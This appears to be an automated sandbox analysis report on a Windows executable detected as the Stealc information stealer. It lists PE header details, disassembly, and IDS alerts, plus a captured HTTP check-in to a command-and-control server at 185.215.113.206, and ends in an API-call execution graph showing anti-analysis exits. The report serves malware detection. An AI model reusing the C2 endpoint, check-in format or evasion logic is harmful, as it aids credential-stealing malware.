                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                              File Icon

                              Icon Hash:00928e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0xa98000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                              Entrypoint Preview

                              Instruction
                              jmp 00007F5444E5237Ah
                              js 00007F5444E52391h
                              add byte ptr [eax], al
                              jmp 00007F5444E54375h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [edx+ecx], al
                              add byte ptr [eax], al
                              add dword ptr [edx], ecx
                              add byte ptr [eax], al
                              pop es
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [edx], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx], al
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              or ecx, dword ptr [edx]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              pushad
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Rich Headers

                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x2490000x16200b970bc4668bd3b09d7d10b9e6a7ac18dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x24a0000x2b00x20014d6a6b72cbfd04e1f75aca3739adfc9False0.798828125data6.025684365468982IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x24c0000x2aa0000x20017c4a37063a95caf43a81e1b5f0eeb48unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              cgikgxeh0x4f60000x1a10000x1a0a00e3ff7b204ef2c2a23e971f8d47411dddFalse0.9947137291854186data7.9541098731783055IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              aetjlfry0x6970000x10000x6001f93bd451485f53e61cab50f1f2555c6False0.54296875data4.716279334483298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x6980000x30000x220084460cc326e9e12310942be19f134d08False0.06020220588235294DOS executable (COM)0.6210936678275637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_MANIFEST0x6967380x256ASCII text, with CRLF line terminators0.5100334448160535

                              Imports

                              DLLImport
                              kernel32.dlllstrcpy

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-11-24T20:01:19.759532+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749706185.215.113.20680TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 24, 2024 20:01:17.516226053 CET4970680192.168.2.7185.215.113.206
                              Nov 24, 2024 20:01:17.639858961 CET8049706185.215.113.206192.168.2.7
                              Nov 24, 2024 20:01:17.639945984 CET4970680192.168.2.7185.215.113.206
                              Nov 24, 2024 20:01:17.640937090 CET4970680192.168.2.7185.215.113.206
                              Nov 24, 2024 20:01:17.771150112 CET8049706185.215.113.206192.168.2.7
                              Nov 24, 2024 20:01:19.258642912 CET8049706185.215.113.206192.168.2.7
                              Nov 24, 2024 20:01:19.258702040 CET4970680192.168.2.7185.215.113.206
                              Nov 24, 2024 20:01:19.261564970 CET4970680192.168.2.7185.215.113.206
                              Nov 24, 2024 20:01:19.414659023 CET8049706185.215.113.206192.168.2.7
                              Nov 24, 2024 20:01:19.758934021 CET8049706185.215.113.206192.168.2.7
                              Nov 24, 2024 20:01:19.759531975 CET4970680192.168.2.7185.215.113.206
                              Nov 24, 2024 20:01:24.525204897 CET4970680192.168.2.7185.215.113.206

                              HTTP Request Dependency Graph

                              • 185.215.113.206

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.749706185.215.113.206807604C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
                              Nov 24, 2024 20:01:17.640937090 CET90OUTGET / HTTP/1.1
                              Host: 185.215.113.206
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Nov 24, 2024 20:01:19.258642912 CET203INHTTP/1.1 200 OK
                              Date: Sun, 24 Nov 2024 19:01:19 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Nov 24, 2024 20:01:19.261564970 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----AAFIJKKEHJDHJKFIECAA
                              Host: 185.215.113.206
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 33 33 41 32 30 32 42 34 44 38 38 31 35 33 35 34 31 38 33 32 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 2d 2d 0d 0a
                              Data Ascii: ------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="hwid"133A202B4D881535418320------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="build"mars------AAFIJKKEHJDHJKFIECAA--
                              Nov 24, 2024 20:01:19.758934021 CET210INHTTP/1.1 200 OK
                              Date: Sun, 24 Nov 2024 19:01:19 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              System Behavior

                              General

                              Target ID:3
                              Start time:14:01:12
                              Start date:24/11/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0x6a0000
                              File size:1'812'992 bytes
                              MD5 hash:969E7116D6269D76AE0DF0B8126872E9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000003.1288333304.0000000005050000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:4.9%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:16.3%
                                Total number of Nodes:1406
                                Total number of Limit Nodes:28
                                execution_graph 27434 6b1269 408 API calls 27406 6a5869 57 API calls 27425 6c2d60 11 API calls 27442 6ca280 __CxxFrameHandler 27443 6c2b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27415 6be0f9 140 API calls 27444 6b6b79 138 API calls 27408 6a8c79 strcpy_s 27438 6bf2f8 93 API calls 27445 6a1b64 162 API calls 27453 6abbf9 90 API calls 25967 6c1bf0 26019 6a2a90 25967->26019 25971 6c1c03 25972 6c1c29 lstrcpy 25971->25972 25973 6c1c35 25971->25973 25972->25973 25974 6c1c6d GetSystemInfo 25973->25974 25975 6c1c65 ExitProcess 25973->25975 25976 6c1c7d ExitProcess 25974->25976 25977 6c1c85 25974->25977 26120 6a1030 GetCurrentProcess VirtualAllocExNuma 25977->26120 25982 6c1cb8 26132 6c2ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25982->26132 25983 6c1ca2 25983->25982 25984 6c1cb0 ExitProcess 25983->25984 25986 6c1cbd 25987 6c1ce7 lstrlen 25986->25987 26341 6c2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25986->26341 25991 6c1cff 25987->25991 25989 6c1cd1 25989->25987 25994 6c1ce0 ExitProcess 25989->25994 25990 6c1d23 lstrlen 25992 6c1d39 25990->25992 25991->25990 25993 6c1d13 lstrcpy lstrcat 25991->25993 25995 6c1d5a 25992->25995 25996 6c1d46 lstrcpy lstrcat 25992->25996 25993->25990 25997 6c2ad0 3 API calls 25995->25997 25996->25995 25998 6c1d5f lstrlen 25997->25998 26001 6c1d74 25998->26001 25999 6c1d9a lstrlen 26000 6c1db0 25999->26000 26003 6c1dce 26000->26003 26004 6c1dba lstrcpy lstrcat 26000->26004 26001->25999 26002 6c1d87 lstrcpy lstrcat 26001->26002 26002->25999 26134 6c2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 26003->26134 26004->26003 26006 6c1dd3 lstrlen 26007 6c1de7 26006->26007 26008 6c1df7 lstrcpy lstrcat 26007->26008 26009 6c1e0a 26007->26009 26008->26009 26010 6c1e28 lstrcpy 26009->26010 26011 6c1e30 26009->26011 26010->26011 26012 6c1e56 OpenEventA 26011->26012 26013 6c1e8c CreateEventA 26012->26013 26014 6c1e68 CloseHandle Sleep OpenEventA 26012->26014 26135 6c1b20 GetSystemTime 26013->26135 26014->26013 26014->26014 26018 6c1ea5 CloseHandle ExitProcess 26342 6a4a60 26019->26342 26021 6a2aa1 26022 6a4a60 2 API calls 26021->26022 26023 6a2ab7 26022->26023 26024 6a4a60 2 API calls 26023->26024 26025 6a2acd 26024->26025 26026 6a4a60 2 API calls 26025->26026 26027 6a2ae3 26026->26027 26028 6a4a60 2 API calls 26027->26028 26029 6a2af9 26028->26029 26030 6a4a60 2 API calls 26029->26030 26031 6a2b0f 26030->26031 26032 6a4a60 2 API calls 26031->26032 26033 6a2b28 26032->26033 26034 6a4a60 2 API calls 26033->26034 26035 6a2b3e 26034->26035 26036 6a4a60 2 API calls 26035->26036 26037 6a2b54 26036->26037 26038 6a4a60 2 API calls 26037->26038 26039 6a2b6a 26038->26039 26040 6a4a60 2 API calls 26039->26040 26041 6a2b80 26040->26041 26042 6a4a60 2 API calls 26041->26042 26043 6a2b96 26042->26043 26044 6a4a60 2 API calls 26043->26044 26045 6a2baf 26044->26045 26046 6a4a60 2 API calls 26045->26046 26047 6a2bc5 26046->26047 26048 6a4a60 2 API calls 26047->26048 26049 6a2bdb 26048->26049 26050 6a4a60 2 API calls 26049->26050 26051 6a2bf1 26050->26051 26052 6a4a60 2 API calls 26051->26052 26053 6a2c07 26052->26053 26054 6a4a60 2 API calls 26053->26054 26055 6a2c1d 26054->26055 26056 6a4a60 2 API calls 26055->26056 26057 6a2c36 26056->26057 26058 6a4a60 2 API calls 26057->26058 26059 6a2c4c 26058->26059 26060 6a4a60 2 API calls 26059->26060 26061 6a2c62 26060->26061 26062 6a4a60 2 API calls 26061->26062 26063 6a2c78 26062->26063 26064 6a4a60 2 API calls 26063->26064 26065 6a2c8e 26064->26065 26066 6a4a60 2 API calls 26065->26066 26067 6a2ca4 26066->26067 26068 6a4a60 2 API calls 26067->26068 26069 6a2cbd 26068->26069 26070 6a4a60 2 API calls 26069->26070 26071 6a2cd3 26070->26071 26072 6a4a60 2 API calls 26071->26072 26073 6a2ce9 26072->26073 26074 6a4a60 2 API calls 26073->26074 26075 6a2cff 26074->26075 26076 6a4a60 2 API calls 26075->26076 26077 6a2d15 26076->26077 26078 6a4a60 2 API calls 26077->26078 26079 6a2d2b 26078->26079 26080 6a4a60 2 API calls 26079->26080 26081 6a2d44 26080->26081 26082 6a4a60 2 API calls 26081->26082 26083 6a2d5a 26082->26083 26084 6a4a60 2 API calls 26083->26084 26085 6a2d70 26084->26085 26086 6a4a60 2 API calls 26085->26086 26087 6a2d86 26086->26087 26088 6a4a60 2 API calls 26087->26088 26089 6a2d9c 26088->26089 26090 6a4a60 2 API calls 26089->26090 26091 6a2db2 26090->26091 26092 6a4a60 2 API calls 26091->26092 26093 6a2dcb 26092->26093 26094 6a4a60 2 API calls 26093->26094 26095 6a2de1 26094->26095 26096 6a4a60 2 API calls 26095->26096 26097 6a2df7 26096->26097 26098 6a4a60 2 API calls 26097->26098 26099 6a2e0d 26098->26099 26100 6a4a60 2 API calls 26099->26100 26101 6a2e23 26100->26101 26102 6a4a60 2 API calls 26101->26102 26103 6a2e39 26102->26103 26104 6a4a60 2 API calls 26103->26104 26105 6a2e52 26104->26105 26106 6c6390 GetPEB 26105->26106 26107 6c65c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26106->26107 26108 6c63c3 26106->26108 26109 6c6638 26107->26109 26110 6c6625 GetProcAddress 26107->26110 26115 6c63d7 20 API calls 26108->26115 26111 6c666c 26109->26111 26112 6c6641 GetProcAddress GetProcAddress 26109->26112 26110->26109 26113 6c6688 26111->26113 26114 6c6675 GetProcAddress 26111->26114 26112->26111 26116 6c66a4 26113->26116 26117 6c6691 GetProcAddress 26113->26117 26114->26113 26115->26107 26118 6c66ad GetProcAddress GetProcAddress 26116->26118 26119 6c66d7 26116->26119 26117->26116 26118->26119 26119->25971 26121 6a105e VirtualAlloc 26120->26121 26122 6a1057 ExitProcess 26120->26122 26123 6a107d 26121->26123 26124 6a108a VirtualFree 26123->26124 26125 6a10b1 26123->26125 26124->26125 26126 6a10c0 26125->26126 26127 6a10d0 GlobalMemoryStatusEx 26126->26127 26129 6a1112 ExitProcess 26127->26129 26130 6a10f5 26127->26130 26130->26129 26131 6a111a GetUserDefaultLangID 26130->26131 26131->25982 26131->25983 26133 6c2b24 26132->26133 26133->25986 26134->26006 26347 6c1820 26135->26347 26137 6c1b81 sscanf 26386 6a2a20 26137->26386 26140 6c1be9 26143 6bffd0 26140->26143 26141 6c1bd6 26141->26140 26142 6c1be2 ExitProcess 26141->26142 26144 6bffe0 26143->26144 26145 6c000d lstrcpy 26144->26145 26146 6c0019 lstrlen 26144->26146 26145->26146 26147 6c00d0 26146->26147 26148 6c00db lstrcpy 26147->26148 26149 6c00e7 lstrlen 26147->26149 26148->26149 26150 6c00ff 26149->26150 26151 6c010a lstrcpy 26150->26151 26152 6c0116 lstrlen 26150->26152 26151->26152 26153 6c012e 26152->26153 26154 6c0139 lstrcpy 26153->26154 26155 6c0145 26153->26155 26154->26155 26388 6c1570 26155->26388 26158 6c016e 26159 6c018f lstrlen 26158->26159 26160 6c0183 lstrcpy 26158->26160 26161 6c01a8 26159->26161 26160->26159 26162 6c01bd lstrcpy 26161->26162 26163 6c01c9 lstrlen 26161->26163 26162->26163 26164 6c01e8 26163->26164 26165 6c020c lstrlen 26164->26165 26166 6c0200 lstrcpy 26164->26166 26167 6c026a 26165->26167 26166->26165 26168 6c0282 lstrcpy 26167->26168 26169 6c028e 26167->26169 26168->26169 26398 6a2e70 26169->26398 26177 6c0540 26178 6c1570 4 API calls 26177->26178 26179 6c054f 26178->26179 26180 6c05a1 lstrlen 26179->26180 26181 6c0599 lstrcpy 26179->26181 26182 6c05bf 26180->26182 26181->26180 26183 6c05d1 lstrcpy lstrcat 26182->26183 26184 6c05e9 26182->26184 26183->26184 26185 6c0614 26184->26185 26186 6c060c lstrcpy 26184->26186 26187 6c061b lstrlen 26185->26187 26186->26185 26188 6c0636 26187->26188 26189 6c064a lstrcpy lstrcat 26188->26189 26190 6c0662 26188->26190 26189->26190 26191 6c0687 26190->26191 26192 6c067f lstrcpy 26190->26192 26193 6c068e lstrlen 26191->26193 26192->26191 26194 6c06b3 26193->26194 26195 6c06c7 lstrcpy lstrcat 26194->26195 26196 6c06db 26194->26196 26195->26196 26197 6c0704 lstrcpy 26196->26197 26198 6c070c 26196->26198 26197->26198 26199 6c0749 lstrcpy 26198->26199 26200 6c0751 26198->26200 26199->26200 27154 6c2740 GetWindowsDirectoryA 26200->27154 26202 6c0785 27163 6a4c50 26202->27163 26203 6c075d 26203->26202 26205 6c077d lstrcpy 26203->26205 26205->26202 26206 6c078f 27317 6b8ca0 StrCmpCA 26206->27317 26208 6c079b 26209 6a1530 8 API calls 26208->26209 26210 6c07bc 26209->26210 26211 6c07ed 26210->26211 26212 6c07e5 lstrcpy 26210->26212 27335 6a60d0 80 API calls 26211->27335 26212->26211 26214 6c07fa 27336 6b81b0 10 API calls 26214->27336 26216 6c0809 26217 6a1530 8 API calls 26216->26217 26218 6c082f 26217->26218 26219 6c085e 26218->26219 26220 6c0856 lstrcpy 26218->26220 27337 6a60d0 80 API calls 26219->27337 26220->26219 26222 6c086b 27338 6b7ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 26222->27338 26224 6c0876 26225 6a1530 8 API calls 26224->26225 26226 6c08a1 26225->26226 26227 6c08c9 lstrcpy 26226->26227 26228 6c08d5 26226->26228 26227->26228 27339 6a60d0 80 API calls 26228->27339 26230 6c08db 27340 6b8050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 26230->27340 26232 6c08e6 26233 6a1530 8 API calls 26232->26233 26234 6c08f7 26233->26234 26235 6c092e 26234->26235 26236 6c0926 lstrcpy 26234->26236 27341 6a5640 8 API calls 26235->27341 26236->26235 26238 6c0933 26239 6a1530 8 API calls 26238->26239 26240 6c094c 26239->26240 27342 6b7280 1497 API calls 26240->27342 26242 6c099f 26243 6a1530 8 API calls 26242->26243 26244 6c09cf 26243->26244 26245 6c09fe 26244->26245 26246 6c09f6 lstrcpy 26244->26246 27343 6a60d0 80 API calls 26245->27343 26246->26245 26248 6c0a0b 27344 6b83e0 7 API calls 26248->27344 26250 6c0a18 26251 6a1530 8 API calls 26250->26251 26252 6c0a29 26251->26252 27345 6a24e0 230 API calls 26252->27345 26254 6c0a6b 26255 6c0a7f 26254->26255 26256 6c0b40 26254->26256 26257 6a1530 8 API calls 26255->26257 26258 6a1530 8 API calls 26256->26258 26259 6c0aa5 26257->26259 26260 6c0b59 26258->26260 26262 6c0acc lstrcpy 26259->26262 26263 6c0ad4 26259->26263 26261 6c0b87 26260->26261 26264 6c0b7f lstrcpy 26260->26264 27349 6a60d0 80 API calls 26261->27349 26262->26263 27346 6a60d0 80 API calls 26263->27346 26264->26261 26267 6c0b8d 27350 6bc840 70 API calls 26267->27350 26268 6c0ada 27347 6b85b0 47 API calls 26268->27347 26271 6c0b38 26274 6c0bd1 26271->26274 26277 6a1530 8 API calls 26271->26277 26272 6c0ae5 26273 6a1530 8 API calls 26272->26273 26276 6c0af6 26273->26276 26275 6c0bfa 26274->26275 26278 6a1530 8 API calls 26274->26278 26279 6c0c23 26275->26279 26283 6a1530 8 API calls 26275->26283 27348 6bd0f0 118 API calls 26276->27348 26281 6c0bb9 26277->26281 26282 6c0bf5 26278->26282 26285 6c0c4c 26279->26285 26290 6a1530 8 API calls 26279->26290 27351 6bd7b0 103 API calls __crtGetStringTypeA_stat 26281->27351 27353 6bdfa0 149 API calls 26282->27353 26288 6c0c1e 26283->26288 26286 6c0c75 26285->26286 26291 6a1530 8 API calls 26285->26291 26292 6c0c9e 26286->26292 26298 6a1530 8 API calls 26286->26298 27354 6be500 108 API calls 26288->27354 26289 6c0bbe 26294 6a1530 8 API calls 26289->26294 26295 6c0c47 26290->26295 26297 6c0c70 26291->26297 26300 6c0cc7 26292->26300 26301 6a1530 8 API calls 26292->26301 26299 6c0bcc 26294->26299 27355 6be720 120 API calls 26295->27355 27356 6be9e0 110 API calls 26297->27356 26304 6c0c99 26298->26304 27352 6becb0 97 API calls 26299->27352 26302 6c0cf0 26300->26302 26307 6a1530 8 API calls 26300->26307 26306 6c0cc2 26301->26306 26308 6c0dca 26302->26308 26309 6c0d04 26302->26309 27357 6a7bc0 153 API calls 26304->27357 27358 6beb70 108 API calls 26306->27358 26312 6c0ceb 26307->26312 26314 6a1530 8 API calls 26308->26314 26313 6a1530 8 API calls 26309->26313 27359 6c41e0 91 API calls 26312->27359 26318 6c0d2a 26313->26318 26316 6c0de3 26314->26316 26317 6c0e11 26316->26317 26319 6c0e09 lstrcpy 26316->26319 27363 6a60d0 80 API calls 26317->27363 26320 6c0d5e 26318->26320 26321 6c0d56 lstrcpy 26318->26321 26319->26317 27360 6a60d0 80 API calls 26320->27360 26321->26320 26324 6c0e17 27364 6bc840 70 API calls 26324->27364 26325 6c0d64 27361 6b85b0 47 API calls 26325->27361 26328 6c0dc2 26331 6a1530 8 API calls 26328->26331 26329 6c0d6f 26330 6a1530 8 API calls 26329->26330 26332 6c0d80 26330->26332 26334 6c0e39 26331->26334 27362 6bd0f0 118 API calls 26332->27362 26335 6c0e67 26334->26335 26337 6c0e5f lstrcpy 26334->26337 27365 6a60d0 80 API calls 26335->27365 26337->26335 26338 6c0e74 26340 6c0e95 26338->26340 27366 6c1660 12 API calls 26338->27366 26340->26018 26341->25989 26343 6a4a76 RtlAllocateHeap 26342->26343 26345 6a4ab4 VirtualProtect 26343->26345 26345->26021 26348 6c182e 26347->26348 26349 6c1849 lstrcpy 26348->26349 26350 6c1855 lstrlen 26348->26350 26349->26350 26351 6c1873 26350->26351 26352 6c1898 26351->26352 26353 6c1885 lstrcpy lstrcat 26351->26353 26354 6c18c7 26352->26354 26355 6c18bf lstrcpy 26352->26355 26353->26352 26356 6c18ce lstrlen 26354->26356 26355->26354 26357 6c18e6 26356->26357 26358 6c18f2 lstrcpy lstrcat 26357->26358 26359 6c1906 26357->26359 26358->26359 26360 6c1935 26359->26360 26361 6c192d lstrcpy 26359->26361 26362 6c193c lstrlen 26360->26362 26361->26360 26363 6c1958 26362->26363 26364 6c196a lstrcpy lstrcat 26363->26364 26365 6c197d 26363->26365 26364->26365 26366 6c19ac 26365->26366 26367 6c19a4 lstrcpy 26365->26367 26368 6c19b3 lstrlen 26366->26368 26367->26366 26369 6c19cb 26368->26369 26370 6c19d7 lstrcpy lstrcat 26369->26370 26371 6c19eb 26369->26371 26370->26371 26372 6c1a1a 26371->26372 26373 6c1a12 lstrcpy 26371->26373 26374 6c1a21 lstrlen 26372->26374 26373->26372 26375 6c1a3d 26374->26375 26376 6c1a4f lstrcpy lstrcat 26375->26376 26377 6c1a62 26375->26377 26376->26377 26378 6c1a91 26377->26378 26379 6c1a89 lstrcpy 26377->26379 26380 6c1a98 lstrlen 26378->26380 26379->26378 26381 6c1ab4 26380->26381 26382 6c1ac6 lstrcpy lstrcat 26381->26382 26383 6c1ad9 26381->26383 26382->26383 26384 6c1b08 26383->26384 26385 6c1b00 lstrcpy 26383->26385 26384->26137 26385->26384 26387 6a2a24 SystemTimeToFileTime SystemTimeToFileTime 26386->26387 26387->26140 26387->26141 26389 6c157f 26388->26389 26390 6c159f lstrcpy 26389->26390 26391 6c15a7 26389->26391 26390->26391 26392 6c15d7 lstrcpy 26391->26392 26393 6c15df 26391->26393 26392->26393 26394 6c160f lstrcpy 26393->26394 26395 6c1617 26393->26395 26394->26395 26396 6c0155 lstrlen 26395->26396 26397 6c1647 lstrcpy 26395->26397 26396->26158 26397->26396 26399 6a4a60 2 API calls 26398->26399 26400 6a2e82 26399->26400 26401 6a4a60 2 API calls 26400->26401 26402 6a2ea0 26401->26402 26403 6a4a60 2 API calls 26402->26403 26404 6a2eb6 26403->26404 26405 6a4a60 2 API calls 26404->26405 26406 6a2ecb 26405->26406 26407 6a4a60 2 API calls 26406->26407 26408 6a2eec 26407->26408 26409 6a4a60 2 API calls 26408->26409 26410 6a2f01 26409->26410 26411 6a4a60 2 API calls 26410->26411 26412 6a2f19 26411->26412 26413 6a4a60 2 API calls 26412->26413 26414 6a2f3a 26413->26414 26415 6a4a60 2 API calls 26414->26415 26416 6a2f4f 26415->26416 26417 6a4a60 2 API calls 26416->26417 26418 6a2f65 26417->26418 26419 6a4a60 2 API calls 26418->26419 26420 6a2f7b 26419->26420 26421 6a4a60 2 API calls 26420->26421 26422 6a2f91 26421->26422 26423 6a4a60 2 API calls 26422->26423 26424 6a2faa 26423->26424 26425 6a4a60 2 API calls 26424->26425 26426 6a2fc0 26425->26426 26427 6a4a60 2 API calls 26426->26427 26428 6a2fd6 26427->26428 26429 6a4a60 2 API calls 26428->26429 